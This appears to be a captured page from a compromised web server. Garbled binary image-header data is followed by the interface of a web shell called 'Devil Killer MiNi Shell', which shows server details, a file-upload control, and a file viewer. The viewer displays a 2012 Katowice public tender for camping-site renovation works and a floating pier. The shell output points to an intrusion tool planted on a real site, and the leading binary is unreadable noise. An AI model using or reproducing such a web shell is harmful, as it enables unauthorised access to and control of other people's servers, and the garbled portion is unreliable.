JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120522/113347-N-2012.html

<p class="kh_header"><b>Katowice: Remont sanitariatów, renowacja nawierzchni, budowa wiaty, remont przystani i dostawa pomostu pływającego</b><br>
<b>Numer ogłoszenia: 113347 - 2012; data zamieszczenia: 22.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji , Aleja Korfantego 35, 40-005 Katowice, woj. śląskie, tel. 32 258 53 55, 253 87 33, faks 32 253 87 33.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.um.katowice.pl/jednostki/mosir/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa miasta Katowice nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont sanitariatów, renowacja nawierzchni, budowa wiaty, remont przystani i dostawa pomostu pływającego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia stanowi (z uwzględnieniem postanowień art. 30 Ustawy) remont sanitariatów, renowacja nawierzchni, budowa wiaty, remont przystani oraz dostawa pomostu pływającego. 

Przedmiot zamówienia obejmuje:
1. Remont istniejących sanitariatów oraz dachu nad sauną i kuchnią letnią, w tym:
-roboty rozbiórkowe
-roboty ziemne
-wykonanie ścian i zadaszenia
-roboty instalacyjne wod-kan
-roboty elektryczne
-roboty wykończeniowe
	2.  Renowację nawierzchni asfaltowych
	3.  Budowę wiaty na kontenery do wywozu śmieci
	4.  Dostawę pomostu  pływającego dla potrzeb przystani wodnej
	5.  Remont pomieszczeń przystani.

Na wykonanie powyższych robót został sporządzony kosztorys który obejmuje cały zakres prac do wykonania.

LOKALIZACJA, OPIS STANU ISTNIEJĄCEGO

    W skład obiektu wchodzi: budynek portierni z recepcją i wiatą wjazdową, budynek  świetlicy z punktem gastronomicznym, budynek z pomieszczeniami sanitarnymi, budynek wielofunkcyjny- kuchnia turystyczna z kominkiem oraz sauna, garaże typu Karlik, budynek gospodarczy z sanitariatami, pięć domków kempingowych całorocznych, basen, biologiczna automatyczna oczyszczalnia ścieków, stanowisko mycia samochodów, pola namiotowe, kort tenisowy, kosz do koszykówki, betonowy stół do ping-ponga. Poza terenem obiektu znajduje się hangar przystani sprzętu pływającego i pomosty przystani.

Budynek gastronomiczno-biurowy
powierzchnia zabudowy budynku 368,35m2
powierzchnia użytkowa budynku 343,73m2
kubatura budynku 1487,07m3
wysokość budynku do najwyższego elementu konstrukcyjnego 4,90m

Jest to obiekt jednokondygnacyjny, nie podpiwniczony o konstrukcji słupowo - ryglowej stalowej. Słupy stalowe oparte są na siatce 3x3m. Konstrukcja dachu to wiązary stalowe. Obiekt posadowiony na ławach żelbetowych. Obiekt wyposażony jest w instalację wentylacji, ogrzewania, wod - kan, elektryczną.
- ściany zewnętrzne: płyta warstwowa z rdzeniem poliuretanowym, płyta gipsowo - kartonowa
- przeszklenia: szkło zespolone termoizolacyjne, dwuszybowe, jednostronnie bezpieczne
- okna i drzwi: w ramach aluminiowych malowanych proszkowo w kolorze antracytowoszarym
- dach: blacha trapezowa, wełna mineralna, folia PE, płyta gipsowo - kartonowa
- obróbki blacharskie: blacha ocynkowana malowana proszkowo  w kolorze antracytowoszarym
- rynny i rury spustowe: z blachy ocynkowanej malowane proszkowo
- ściany wewnętrzne: tynk cementowo - wapienny, pustak pianobetonowy, płyta gipsowo -   kartonowa  wełna mineralna, płytki ceramiczne
- sufity: gipsowo - kartonowe sufity podwieszane
- posadzki: płytki ceramiczne antypoślizgowe

Budynek recepcji
powierzchnia zabudowy budynku 47,87m2
powierzchnia użytkowa budynku 40,31m2
kubatura budynku 137,82m3
wysokość budynku do najwyższego elementu konstrukcyjnego 4,42m

Jest to obiekt jednokondygnacyjny nie podpiwniczony o konstrukcji tradycyjnej - ściany murowane 
o grubości 28cm z ceramiki. Obiekt posiada strop żelbetowy ślepy wylewany na mokro. Obiekt posadowiony jest na ławach żelbetowych. Obiekt wyposażony jest w instalację elektryczną.
- ściany zewnętrzne: tynk akrylowy, styropian, pustak ceramiczny, tynk cementowo - wapienny  deski elewacyjne, łata drewniana, folia wiatroizolacyjna, wełna mineralna, pustak ceramiczny, tynk cementowo - wapienny
- przeszklenia: szkło zespolone termoizolacyjne, dwuszybowe, jednostronnie bezpieczne
- okna i drzwi: w ramach aluminiowych malowanych proszkowo w kolorze antracytowoszarym
- płyta warstwowa, płyta gipsowo - kartonowa
- obróbki blacharskie: blacha ocynkowana malowana proszkowo  w kolorze antracytowoszarym
- rynny i rury spustowe: z blachy ocynkowanej malowane proszkowo
- sufity: gipsowo - kartonowe sufity podwieszane
- posadzki: płytki ceramiczne antypoślizgowe.

Budynek pomieszczeń sanitarnych
powierzchnia zabudowy 77,80m2
kubatura 218m3
obiekt parterowy nie podpiwniczony o prostokątnym rzucie poziomym z wymiarami zewnętrznymi 6,30x12,35m. 
W obiekcie znajdują się osobne umywalnie i natryski dla kobiet i mężczyzn z wejściem w ścianach podłużnych oraz przy ścianie szczytowej wschodniej otwarte zadaszone pomieszczenie ze zmywalnią i pralnią.
ściany - murowane o gr. 25cm, obustronnie tynkowane, wewnątrz posiadają wykładziny z płytek glazurowanych 
konstrukcja stropodachu - stalowa, obłożona od spodu i z wierzchu płytami stalowymi z blachy trapezowej, izolowana termicznie
posadzki - wewnątrz betonowe wyłożone płytkami kamionkowymi

Pomieszczenie kuchni i budynek sauny
zadaszenie kuchni 5,20x5,50m
budynek sauny 7,25x12,60m
wysokość wiaty kuchennej 2,25m
wysokość sauny 2,55m
pow. zabudowy wiaty kuchennej 28,60m2
kubatura wiaty kuchennej 64,40m3
pow. zabudowy sauny 73,60m2
kubatura sauny 206,0m3

Obiekt murowany nie podpiwniczony. Wiata kuchenna posiada konstrukcję nośną szkieletową słupowo - ryglową stalową. Słupy wykonane jako zamknięte z dwu ceowników NP-10. Ściany boczne obudowane drewnem. Pokrycie dachowe blachą stalową fałdową. Posadzka brukowana kostką Bauma.
Budynek sauny posiada ściany murowane z cegły i bloczków o gr. 25cm.
Stropodach - izolowany termicznie  z blach fałdowych stalowych na konstrukcji stalowej nośnej.
Stolarka okien i drzwi z profili aluminiowych.
Ściany wewnętrzne i zewnętrzne otynkowane, a dodatkowo wewnątrz boazeria z drewna oraz glazura. Posadzki betonowe wykończone płytkami.

 Budynek gospodarczy z sanitariatami 

Obiekt składa się z trzech niezależnych części. W części środkowej znajduje się hangar do przechowywania sprzętu związanego z funkcjonowaniem oraz utrzymaniem techniczno użytkowym obiektu.
Od strony pola namiotowego zespół sanitariatów i łazienek dla gości kempingu. W części tej wydzielono łazienki damskie i męskie oraz osobną z wyposażeniem umożliwiającym korzystanie przez osoby niepełnosprawne ruchowo.
Od strony zachodniej znajdują się pomieszczenia związane z obsługą i utrzymaniem czystości na terenie obiektu - pomieszczenia magazynowe, porządkowe, socjalne oraz warsztat drobnych napraw.
- powierzchnia zabudowy 461,1m2
- powierzchnia użytkowa 414,3m2
- kubatura 2146m3
- wysokość 5,40m

 Całoroczne domki kempingowe

Zespół domków składa się z pięciu modułów: 4 typu A i 1 typu B. Moduł A zawiera cztery jednostki mieszkalne. Jednostka mieszkalna składa się z pokoju 2-osobowego z możliwością dostawki jednego miejsca oraz z łazienki i aneksu kuchennego dla każdej jednostki i wiatrołapu wspólnego na dwie jednostki.
Moduł B przewidziano dla osób niepełnosprawnych. W module znajdują się 3 jednostki mieszkalne. Pokój 2-osobowy z łazienką i aneksem kuchennym z wyposażeniem dla osoby niepełnosprawnej ze wspólnym wiatrołapem z jednostką standardową, oraz jednostką 4-osobową składającą się z pokoju 2-osobowego, łazienki oraz aneksu kuchennego.

Powierzchnie :
- wymiary jednego budynku 16,12m x 7,98m
- powierzchnia zabudowy  - 636,5m2
- powierzchnia użytkowa 95,4m2 x 5= 477m2
- kubatura 543,2m3 x 5= 2716m3
- wysokość 5,1m
- powierzchnia utwardzona 201,9m2

Przystań
Przystań znajduje się po przeciwnej stronie drogi dojazdowej do Kempingu 215. Przystań uległa podtopieniu  wokół zbiorników wodnych zlokalizowanych na terenie Trzech Stawów.
Głębokość wody w miejscu posadowienia pomostu wynosi 2,00 do 3,00 m.
Dno jest kamieniste.
Akwen z wodą stojącą.
Przewidywany zakres  prowadzonych robót
Zakres prac został przedstawiony w kosztorysie zerowym i opisany za pomocą specyfikacji technicznych obejmuje wykonanie prac, które pozwolą zakończyć etap prac związanych 
z modernizacją kempingu 215 a tym samym podniesieniem poziomu usług na powyższym obiekcie.

Zakres robót:
1. Remont istniejących sanitariatów oraz dachu nad sauną i kuchnią letnią, w tym :
-roboty rozbiórkowe
-roboty ziemne
-wykonanie ścian i zadaszenia
-roboty instalacyjne wod-kan
-roboty elektryczne
-roboty wykończeniowe
2.  Renowacja nawierzchni asfaltowych
Nawierzchnia po renowacji użytkowana będzie przez pojazdy o dużym obciążeniu. Dlatego też należy zastosować betonową kostkę brukową o grubości 8 cm o podwyższonej wytrzymałości spełniającą  normę PN-EN 1338.
Podbudowa jak i kostka brukowa muszą spełniać następujące normy:
PN-EN 13043 (2004) Kruszywa do mieszanek bitumicznych i powierzchniowych 
PN-B-06712 (1979) Kruszywa mineralne do betonu zwykłego
PN-EN 1008 (2004) Woda zarobowa do betonu 
PN-EN 197-1 (2012) Cement
PN-79/B-06711 Kruszywa mineralne - Piaski do zapraw budowalnych 
PN-EN 1338 (2004) Betonowa kostka brukowa
Koryto wykonane w podłożu powinno być wyprofilowane zgodnie z założonymi spadkami podłużnymi i poprzecznymi.
Wskaźnik zagęszczenia koryta nie powinien być mniejszy niż 0,91 według metody Proctora.
Podsypka
Na podsypkę należy stosować piasek odpowiadający wymaganiom PN-79/B-06711. Grubość podsypki po zagęszczeniu powinna wynosić 3 cm. Podsypka powinna być zwilżona wodą, zagęszczona i wyprofilowana.
Z uwagi na różnorodność kształtów i kolorów produkowanych kostek, możliwe jest ułożenie dowolnego wzoru - wcześniej ustalonego i zaakceptowanego przez Inspektora Nadzoru lub przedstawiciela Zamawiającego. Kostkę układać należy na podsypce lub podłożu piaszczystym w taki sposób, aby szczeliny między kostkami wynosiły od 2 do 3 mm.
Kostkę należy układać ok. 1,5 cm wyżej od projektowanej niwelety odboju, gdyż 
w czasie wibrowania (ubijania) podsypka ulega zagęszczeniu. Po ułożeniu kostki, szczeliny należy wypełnić piaskiem, a następnie zamieść powierzchnię ułożonych kostek przy użyciu szczotek ręcznych lub mechanicznych i przystąpić do ubijania nawierzchni. Do ubijania ułożonej nawierzchni z kostek brukowych, należy stosować wibratory płytowe z osłoną z tworzywa sztucznego dla ochrony kostek przed uszkodzeniem i zabrudzeniem. Wibrowanie należy prowadzić od krawędzi powierzchni ubijanej w kierunku środka i jednocześnie w kierunku poprzecznym kształtek. Do zagęszczania nawierzchni z betonowych kostek brukowych nie wolno używać walca. Po ubiciu nawierzchni należy uzupełnić szczeliny materiałem do wypełnienia i zamieść nawierzchnię. 
Materiały użyte powinny spełniać normy :
Do produkcji kostki brukowej należy stosować cement portlandzki, bez dodatków, klasy nie niższej niż 35. Zaleca się stosowanie cementu o jasnym kolorze. Cement powinien odpowiadać wymaganiom PN-B-197-1.
Kruszywo do betonu
Należy stosować kruszywa mineralne odpowiadające wymaganiom PN-B 06712. 
Woda
Woda powinna odpowiadać wymaganiom PN-EN 1008.
Dodatki
Do produkcji kostek brukowych stosuje się dodatki w postaci plastyfikatorów i barwników, zgodnie z receptą laboratoryjną.
Plastyfikatory zapewniają gotowym wyrobom większą wytrzymałość, mniejszą nasiąkliwość 
i większą odporność na niskie temperatury i działanie soli. Stosowane barwniki powinny zapewnić kostce trwałe wybarwienie. Powinny to być barwniki nieorganiczne.
Sprzęt
Małe powierzchnie drogi z kostki brukowej wykonuje się ręcznie. Jeśli powierzchnie są duże, 
a kostki brukowe mają jednolity kształt i kolor, można stosować mechaniczne urządzenia układające. Do zagęszczenia nawierzchni stosuje się wibratory płytowe z osłoną z tworzywa sztucznego.
Kontrola robót :
- sprawdzenie prawidłowości ubijania (wibrowania),
- sprawdzenie prawidłowości wypełnienia spoin
- sprawdzenie, czy przyjęty deseń (wzór) i kolor nawierzchni jest zachowany. 
Sprawdzenie równości nawierzchni przeprowadzać należy łatą co najmniej raz na każde 150 do 300 m2 ułożonego odboju  i w miejscach wątpliwych, 
Dopuszczalny prześwit pod łatą 4 m nie powinien przekraczać 1,0 cm.

3.  Budowa wiaty na kontenery do wywozu śmieci
4.  Dostawa pomostu  pływającego dla potrzeb przystani wodnej
5.  Remont pomieszczeń przystani

Zakres prac:
- wykonanie remontu pomieszczeń sanitariatów w nawiązaniu do wyremontowanej już części Kempingu,
- podniesienie i wykonanie nowego zadaszenia nad sauną i kuchnią letnią 
- wymiana nawierzchni asfaltowej na nawierzchnię z kostki brukowej
- wybudowanie wiaty mieszczącej kontenery na śmieci
- wyremontowanie przystani wodnej i dostawa z montażem pomostu pływającego:
Dane dotyczące pomostu pływającego: 
Podstawowe parametry :
długość L = 20,0m
szerokość B = 2,4m
wysokość H = 0,4m 
Pomost należy wykonać w systemie modułowym na bazie stalowej ramy wypełnionej elementami wypornościowymi ze spienionego polistyrenu. Rama powinna posiada system mocowań umożliwiający połączenie modułów w pomost pływający o bardzo różnorodnych konfiguracjach. Pokład modułu stanowić powinny listwy z drewna sosnowego impregnowanego ciśnieniowo o gr. 32mm przykręcane do drewnianych dźwigarów, które opierają się na stalowych belkach poprzecznych.
Pomost należy wyposażyć w obarierowania, pomosty łącznikowe do komunikacji z lądem, knagi i polery cumownicze, drabinki kąpielowe.
Należy wykonać niezbędne prace budowlane w celu zakotwiczenia pomostu pływającego do nabrzeża. 

Ilekroć w opisie przedmiotu zamówienia w niniejszej SIWZ i załącznikach wskazane zostały symbole, nazwy producenta, normy i znaki towarowe należy stosować materiały równoważne. 

Załączony do SIWZ kosztorys zerowy zawiera szczegółowy obmiar robót, natomiast szczegółowy zakres prac opisany jest w opracowaniu pn. Remont sanitariatów, renowacja nawierzchni, budowa wiaty, remont przystani i dostawa pomostu pływającego (załącznik do SIWZ).

Wybrany wykonawca zobowiązany będzie tak zorganizować przebieg prac budowlanych, aby nie zakłócać toku funkcjonowania obiektu. Roboty uciążliwe (hałas, pył) muszą być prowadzone w terminach i porach uzgodnionych z Zamawiającym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.40.00.00-1, 45.41.00.00-4, 45.44.21.00-8, 45.26.23.10-7, 45.26.25.00-6, 45.33.00.00-9, 45.31.11.00-0, 45.24.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca winien wnieść wadium przetargowe  w wysokości 20.000,00 zł przed upływem terminu składania ofert, zgodnie z art. 45.3 Ustawy.
2.	Wadium może być wnoszone w formie jak określono w art. 45 ust.6 ustawy. 
3.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na niżej wymieniony rachunek bankowy zamawiającego:
	ING Bank Śląski S.A.  Oddział  Katowice nr  48 1050 1214 1000 0022 0055 0750  z dopiskiem: wadium dla zamówienia TT/R/10/05/12 - remont  - Kemping 215.
Ksero dowodu wpłaty wadium należy  załączyć do oferty.
4.	Oryginał dokumentu potwierdzającego wniesienie wadium w innej formie niż pieniądzu (gwarancje bezwarunkowe i płatne na pierwsze żądanie) należy załączyć  do oferty.
5.	Zwrot wadium i żądanie ponownego wniesienia wadium nastąpi zgodnie z art. 46 Ustawy.
6.	Na podstawie art. 46 ust. 4a i 5 ustawy zamawiający zatrzymuje wadium wraz z odsetkami.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeśli Wykonawca wykaże, że wykonał samodzielnie lub wspólnie w rozumieniu art. 23 ustawy jedno zadanie w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie tj.  robotę budowlaną w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia oraz poda rodzaj i wartość robót, daty i miejsca wykonania i załączy dokumenty potwierdzające, że roboty zostały wykonanie zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone. Przez jedną robotę budowlaną o której mowa powyżej rozumie się:
- wykonanie co najmniej jednej roboty budowlanej polegającej na wykonaniu, remoncie lub modernizacji budynku o powierzchni użytkowej co najmniej 250 m2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna spełnienie warunku, jeśli Wykonawca wykaże, że dysponuje odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia tj. wykaże osoby, które będą uczestniczyć w wykonywaniu zamówienia i przedstawi informację o podstawie do dysponowania tymi osobami, i tak: złoży pisemne oświadczenie, że osoby które będą wykonywać zamówienie posiadają niżej określone uprawnienia: 
	Kierownik budowy -  uprawnienia budowlane w specjalności konstrukcyjno-budowlanej,
Kierownik robót - uprawnienia budowlane w specjalności instalacyjnej w zakresie  sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych, cieplnych, wentylacyjnych i gazowych, 
Kierownik robót - uprawnienia budowlane  w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektro-energetycznych
lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz posiadają aktualne zaświadczenia o przynależności do właściwej Okręgowej Izby Samorządu Zawodowego w oparciu o art. 6 ust. 1 ustawy z dnia 15 grudnia 2000r. o samorządach zawodowych architektów inżynierów oraz urbanistów (Dz. U. z 2001r. nr 5 poz. 42 za zm.)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku w tym zakresie na podstawie złożonego wraz z ofertą oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

